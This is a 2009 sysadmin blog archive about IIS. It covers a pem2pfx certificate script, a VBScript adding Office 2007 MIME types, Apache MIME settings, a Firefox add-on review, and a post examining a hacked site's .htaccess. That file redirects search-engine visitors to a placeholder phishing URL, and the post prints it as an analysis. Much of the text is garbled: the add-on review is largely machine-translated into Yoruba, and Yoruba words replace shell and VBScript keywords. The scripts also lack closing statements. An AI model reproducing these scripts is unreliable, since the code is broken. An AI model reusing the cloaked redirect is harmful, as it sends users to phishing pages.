Tag-Archive for » IIS «

Wednesday, March 18th, 2009 | Author:

[edit] So much for that. It turns out that openssl is able to determine that the key and certificate are already in a single file. Therefore, no csplitting required (daradara, I hope somebody reading this at least learned about how nice csplit is). In fact, the whole script might as well be obsoleteblaargh. Well, at least it gives a nice warning about not giving a blank passphrase. 😀

Here’s the new version:

pem2pfxconverts a .pem-formatted file containing a private key and signed certificate into a Windows-compatible .pfx certificate file.

#Tricky - brendan@swti o ba titspirit.co.za
# Converts a .pem certificate file to .pfx format
# $1 is the source file
set -e
ti o ba ti [ $# = 1 ]; then
  outputfile=`echo $1 | sed 's/.pem$/.pfx/'`
  echo "Please specify a password below. Windows refuses to import a .pfx certificate with a blank password."
  openssl pkcs12 -export -out $outputfile -in $1
  echo "pem2pfx - converts a .pem formatted private-key and certificate file to an IIS-compatible .pfx file."
  echo "Usage: pem2pfx inputfile.pem"


Saturday, February 21st, 2009 | Author:

The relatively new document types Office 2007 has given some web hosts problems when their clients want to offer documents for download. Most often, the documents are being offered by the web server as text/html which is then rendered as a ton of garbage on the web user’s screen.

The best way to resolve this is to add all the MIME types to the server’s main configuration. IIS7 for Windows already has these MIME types set up correctly by default. IIS6 and IIS5 require the MIME types to be added, as might Apache on older installations. For Apache, there is also a workaround for the individual domain owner to add the mime types via Apache’s .htaccess file.

IIS 6 MIME type addition (for the Server Administrator)

Before this can be done, ensure that your server is also set to allow direct metabase editing:

  1. Load IIS Manager: Start -> Run, “inetmgr” -> [OK]
  2. Right click theserverand clickProperties
  3. Within theInternet Information Servicestab (usually the only tab), ensure that theEnable Direct Metabase Editcheckbox is checked.
  4. Click [OK]

Be sure to back up IIS’s configuration (here for IIS5) beforehand. I won’t take any responsibility for an admin breaking his server. I have reason to believe this may also work on IIS5 however I have just as much reason to believe that it might just give lots of errors. If an IIS5 / Windows 2000 admin is willing to test this for me after backing up your configuration please let me know of the results.

Copy the following text into a file named msoff07-addmime.vbs and execute it once from the commandline by typing cscript msoff07-addmime.vbs and pressing Enter. If you run it more than once, the MIME types will be added each time and you will have multiple identical entries:

' This script adds the necessary Office 2007 MIME types to an IIS 6 Server.
' To use this script, just double-click or execute it from a command line.
' Running this script multiple times results in multiple entries in the
' IIS MimeMap so you should not run it more than once.
' Modified from http://msdn.microsoft.com/en-us/library/ms752346.aspx
Dim MimeMapObj, MimeMapArray, MimeTypesToAddArray, WshShell, oExec
' Set the MIME types to be added
MimeTypesToAddArray = Array(".docm", "application/vnd.ms-word.document.macroEnabled.12", _
".docx", "application/vnd.openxmlformats-officedocument.wordprocessingml.document", _
".dotm", "application/vnd.ms-word.template.macroEnabled.12", _
".dotx", "application/vnd.openxmlformats-officedocument.wordprocessingml.template", _
".potm", "application/vnd.ms-powerpoint.template.macroEnabled.12", _
".potx", "application/vnd.openxmlformats-officedocument.presentationml.template", _
".ppam", "application/vnd.ms-powerpoint.addin.macroEnabled.12", _
".ppsm", "application/vnd.ms-powerpoint.slideshow.macroEnabled.12", _
".ppsx", "application/vnd.openxmlformats-officedocument.presentationml.slideshow", _
".pptm", "application/vnd.ms-powerpoint.presentation.macroEnabled.12", _
".pptx", "application/vnd.openxmlformats-officedocument.presentationml.presentation", _
".sldm", "application/vnd.ms-powerpoint.slide.macroEnabled.12", _
".sldx", "application/vnd.openxmlformats-officedocument.presentationml.slide", _
".xlam", "application/vnd.ms-excel.addin.macroEnabled.12", _
".xlsb", "application/vnd.ms-excel.sheet.binary.macroEnabled.12", _
".xlsm", "application/vnd.ms-excel.sheet.macroEnabled.12", _
".xlsx", "application/vnd.openxmlformats-officedocument.spreadsheetml.sheet", _
".xltm", "application/vnd.ms-excel.template.macroEnabled.12", _
".xltx", "application/vnd.openxmlformats-officedocument.spreadsheetml.template") 
' Get the mimemap object
Set MimeMapObj = GetObject("IIS://LocalHost/MimeMap")
' Call AddMimeType for every pair of extension/MIME type
For counter = 0 si UBound(MimeTypesToAddArray) Step 2
    AddMimeType MimeTypesToAddArray(counter), MimeTypesToAddArray(counter+1)
' Create a Shell object
Set WshShell = CreateObject("WScript.Shell")
' Stop and Start the IIS Service
Set oExec = WshShell.Exec("net stop w3svc")
Do While oExec.Status = 0
    WScript.Sleep 100
Set oExec = WshShell.Exec("net start w3svc")
Do While oExec.Status = 0
    WScript.Sleep 100
Set oExec = Nothing
' Report status to user
WScript.Echo "Microsoft Office 2007 Document MIME types have been registered."
' AddMimeType Sub
Sub AddMimeType (Ext, MType)
    ' Get the mappings from the MimeMap property.
    MimeMapArray = MimeMapObj.GetEx("MimeMap") 
    ' Add a new mapping.
    i = UBound(MimeMapArray) + 1
    Redim Preserve MimeMapArray(i)
    Set MimeMapArray(i) = CreateObject("MimeMap")
    MimeMapArray(i).Extension = Ext
    MimeMapArray(i).MimeType = MType
    MimeMapObj.PutEx ADS_PROPERTY_UPDATE, "MimeMap", MimeMapArray
End Sub

Apache MIME type addition (for the Server Administrator)

Apache stores its MIME types in a file normally located at $installpath/conf/mime.types. See the mod_mime documentation for more on how it works. Arch Linux installs its MIME types at /etc/httpd/conf/mime.types ati Parallels Plesk installs it in /usr/local/psa/admin/conf/mime.types. Your distribution might have it in another place, so find your mime.types file by running locate mime.types.

Add the following lines to your mime.types file:

application/vnd.ms-word.document.macroEnabled.12                          docm
application/vnd.openxmlformats-officedocument.wordprocessingml.document   docx
application/vnd.ms-word.template.macroEnabled.12                          dotm
application/vnd.openxmlformats-officedocument.wordprocessingml.template   dotx
application/vnd.ms-powerpoint.template.macroEnabled.12                    potm
application/vnd.openxmlformats-officedocument.presentationml.template     potx
application/vnd.ms-powerpoint.addin.macroEnabled.12                       ppam
application/vnd.ms-powerpoint.slideshow.macroEnabled.12                   ppsm
application/vnd.openxmlformats-officedocument.presentationml.slideshow    ppsx
application/vnd.ms-powerpoint.presentation.macroEnabled.12                pptm
application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
application/vnd.ms-powerpoint.slide.macroEnabled.12                       sldm
application/vnd.openxmlformats-officedocument.presentationml.slide        sldx
application/vnd.ms-excel.addin.macroEnabled.12                            xlam
application/vnd.ms-excel.sheet.binary.macroEnabled.12                     xlsb
application/vnd.ms-excel.sheet.macroEnabled.12                            xlsm
application/vnd.openxmlformats-officedocument.spreadsheetml.sheet         xlsx
application/vnd.ms-excel.template.macroEnabled.12                         xltm
application/vnd.openxmlformats-officedocument.spreadsheetml.template      xltx

Apache MIME type addition (For the domain owner with at least FTP accessusing .htaccess file)

Add the following text to your domain’s .htaccess file, most commonly in an httpdocs/ directory

AddType application/vnd.ms-word.document.macroEnabled.12 docm
AddType application/vnd.openxmlformats-officedocument.wordprocessingml.document docx
AddType application/vnd.ms-word.template.macroEnabled.12 dotm
AddType application/vnd.openxmlformats-officedocument.wordprocessingml.template dotx
AddType application/vnd.ms-powerpoint.template.macroEnabled.12 potm
AddType application/vnd.openxmlformats-officedocument.presentationml.template potx
AddType application/vnd.ms-powerpoint.addin.macroEnabled.12 ppam
AddType application/vnd.ms-powerpoint.slideshow.macroEnabled.12 ppsm
AddType application/vnd.openxmlformats-officedocument.presentationml.slideshow ppsx
AddType application/vnd.ms-powerpoint.presentation.macroEnabled.12 pptm
AddType application/vnd.openxmlformats-officedocument.presentationml.presentation pptx
AddType application/vnd.ms-powerpoint.slide.macroEnabled.12 sldm
AddType application/vnd.openxmlformats-officedocument.presentationml.slide sldx
AddType application/vnd.ms-excel.addin.macroEnabled.12 xlam
AddType application/vnd.ms-excel.sheet.binary.macroEnabled.12 xlsb
AddType application/vnd.ms-excel.sheet.macroEnabled.12 xlsm
AddType application/vnd.openxmlformats-officedocument.spreadsheetml.sheet xlsx
AddType application/vnd.ms-excel.template.macroEnabled.12 xltm
AddType application/vnd.openxmlformats-officedocument.spreadsheetml.template xltx
Saturday, February 21st, 2009 | Author:

and my Personal Rating (PR) out of 10 😉

I use Akata so most of these won’t apply to non-FF users. However, I’d be very very interested to hear what other addons my friends, subscribers, and random websurfers find interesting or useful to them. Have your say and let us know why you love the addons you love. 🙂

Personally, I prefer addons that aren’t intrusive. Ideally, an addon must have a minimal interface and give me a measurable benefit for me to keep it installed.

Cacheviewer – 7

This is a GUI front-end for the Cache Firefox keeps of the last few pages and media. Mo ti sọ ri yi Addoni diẹ awon ju wulo ọtun bayi ki Mo n jasi lilọ si yọ o ni kete.

ColorfulTabs – 9

Mo ni ife awọn awọ. Awọn taabu awọ-kikojọ ko ṣiṣẹ gan daradara nigba ti o ba de ọdọ nipa 30 awọn taabu tilẹ… :-/

gba awọn Statusbar – 10

Mo fẹ nini ohun gbogbo ni Firefox ni kan nikan window ni awọn taabu. Nini a download apoti ni lọtọ window jẹ ńlá kan ko si-ko fun mi. O tun fi iboju gidi-ini niwon o jẹ gidigidi iwonba. 🙂

Video DownloadHelper – 10

Video DownloadHelper wulẹ fun sisanwọle media – pataki nwa fun eyikeyi ti o tobi akoonu ti wa ni gbaa lati ayelujara. Nigba ti o ba tẹ lori awọn aami, o ti fihan ti o ni Lọwọlọwọ-gbigba ṣiṣan ati yoo fun ọ ni aṣayan lati isinyi o bi a “deede” download.

Niwon o ko mọ ti o ba ti FF wa ni lilọ lati jamba tabi awọn agbara ti wa ni lilọ lati ge, Mo fẹ fẹ lati fi kan daakọ si mi tabili ati ki o Mo le ki o si wo awọn fidio lai lilo diẹ bandiwidi lati gba lati ayelujara awọn fidio lẹẹkansi. tun, nibi ise, nigba ti awon eniyan fi mi ojúewé si youtube tabi awọn miiran media, Mo maa ma ko ribee wiwo till Elo lẹhin – ni ara mi fàájì tabi nigba kan Bireki.

expiry Canary – 9

Yi afinju ati ki o pọọku Addoni sọ ọ ti o ba ti SSL ijẹrisi fun awọn ojula ti o ba Lọwọlọwọ nwo wa ni kete ti lọ si pari. Ti o ba ti ara rẹ sii ni awọn ohun SSL ijẹrisi, Mo ti so o lo yi Addoni lati ran yago fun rẹ sii ká SSL ijẹrisi expiring nitori kan ti o rọrun aini ti iwifunni tabi miscommunication.

Fasterfox – 8

Fasterfox afikun diẹ ninu awọn nẹtiwọki optmisation awọn aṣayan. Diẹ ninu awọn ti awọn aṣayan le ṣe rẹ ajọ nẹtiwọki admin kekere kan asiwere pẹlu ti o tilẹ. 😉

Firebug – 9

Fun ayelujara idagbasoke ati experimentation pẹlu ojúewé. Oniyi fun igbeyewo kekere die-die ti koodu bi daradara bi ṣatunṣe ojúewé.

FoxClocks – 6

err – so fun o ni akoko ni awọn akoko ti ita. o.O Je wulo fun igba diẹ – bayi awọn oniwe-laiṣe niwon mi ori ti wa ni sise o jade yiyara ju mo ti le kokan. RM -F

FoxyProxy – 9

Oniyi fun lilọ kiri kan pato ojúewé nipasẹ kan pato aṣoju apèsè. Eleyi jẹ wulo fun nigba ti diẹ ninu awọn ojula ti wa ni dina tabi awọn SAIX Sihin aṣoju apèsè ti wa ni ko ṣiṣẹ daradara. 🙂

Mo ti lo yi to ipa diẹ ninu awọn ijabọ lori aṣoju apèsè ti mo ti fẹ dipo ko lọ nipasẹ aiyipada ipa-. Awọn oniwe-tun gan rọ. Ti o ba ti o ba ni ju ọkan aṣoju server wa ati awọn ọkan ti o maa n lo lojiji lọ lori awọn seju, o kan yi lori si awọn nigbamii ti ọkan. 🙂

Greasemonkey – 10

Ni bayi, Mo ti lo yi nikan fun awọn GooglemonkeyR akosile. Yi akosile reformats Google'S àwárí esi si rẹ ni pato ki o si tun ni o ni ohun aṣayan lati fi kekere eekanna atanpako ti awọn ojúewé Google ìjápọ si. Greasemonkey le ṣe a pupo siwaju ati siwaju nibẹ ni o wa opolopo ti awọn iwe afọwọkọ ni imurasilẹ wa fun ọpọlọpọ awọn ọpọlọpọ awọn ojula.

Live HTTP afori – 8

Mo ti sọ lo yi kan diẹ igba lati ṣe iwadii gzip funmorawon oran pẹlu IIS ayelujara apèsè. Ko Elo ohun miiran lati sọ tilẹ: O ṣiṣẹ.

Live PageRank – 10 (titi si asiko yi – nikan sori ẹrọ ti o lana)

Eleyi Addoni dabi rọrun to. O n ni awọn PageRank lati Google ati ki o fihan ti o ni atẹ.

NoScript – 10

NoScript ni oniyi ni ìdènà adverts. Awọn oniwe-a kekere irritating ni akọkọ niwon o ni lati whitelist gbogbo awọn ojula ti o fẹ – ṣugbọn ninu awọn gun sure o jẹ soooo tọ ti o. 🙂

jí ojúewé – 10

Gan wulo fun ti o ba ti o ba lọ kiri si ojula ati awọn ti o ṣẹlẹ lati wa ni isalẹ. Ti o ba ti ojula jẹ aimi-akoonu-Oorun ki o si yi mu ki o rọrun lati ni kiakia ri awọn akoonu ti o ba ti awọn oniwe-kashi online.

Tab Mix Plus – 8

Oniyi fun ti o ba ti o ba ni ju 7-tabi-ki awọn taabu.

ShowIP (lilo a ti ikede títúnṣe fun ise ìdí – han ile server ká oṣuwọn ilana orukọ nigbati o nlo kiri) – 10

Emi ko le fojuinu awọn apaadi ti mo fe ti lati lọ nipasẹ lati da a server lai yi ohun itanna. dara, Mo ti le. Lo lati ni lati ṣe eyi gbogbo awọn akoko. Mo ti bajẹ scripted o sugbon Emi ko le ri awọn atilẹba akosile. Eyi ni mi 60-keji igbiyanju ni recreating ohun ti o wà ni wipe akosile:

$ o nran / ati be be / ogun | grep 'ma wà A $ hostname @mycachingnameserver | grep . | grep -v "^;"`
$ ma wà -x 'ma wà A $ hostname @mycachingnameserver | grep ^ $ hostname | grep A | \
  awk '/[.]/{si ta $5}' `@mycachingnameserver | grep . | grep -v "^;"

Web Developer – 9

Mo ti lo yi ni kete ti lati ṣe iwadii diẹ ninu awọn oran pẹlu kan iwe. Emi ko ṣe Elo ayelujara idagbasoke ki ni mo n lilọ lati yọ yi ọkan. Awọn oniwe-ko si ọrọìwòye lori awọn oniwe-agbara niwon Mo gbagbo yi ni a oke ogbontarigi fi-lori ti o ba ti ti o ba ṣe kan pupo ti ayelujara idagbasoke ise.

Thursday, January 22nd, 2009 | Author:

I very recently found a problem with a client’s web site due to a .htaccess file. The site was hosted on a Windows server running IIS using IISPassword, which makes use of .htaccess files for its settings.

IISPassword doesn’t follow exactly the same rules as with Apache however. If the .htaccess file exists then it must contain IISPassword-appropriate rules, otherwise the server returns only the following error:

Error 500 given by IIS Password
Here’s the content of the .htaccess file. I’ve only modified the final redirection URL to point to example.com appropriately:

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yandex.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*rambler.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ya.*$ [NC]
RewriteRule .* http://siffy-phishing-url.example.com [R,L]

If this were on a server running Apache with mod_rewrite, most web users would go directly to the correct site content. Only if they reached the site through the search engines and indexes listed in the .htaccess, would they be redirected to the siffy phishing url that the cracker wants victims to reach.

Dajudaju Of, the cracker (or perhaps even an automated worm) didn’t realise that the server in question didn’t even support these mod_rewrite rules. But either way, this is very worrying as I can foresee many arguments about whether or not the site is working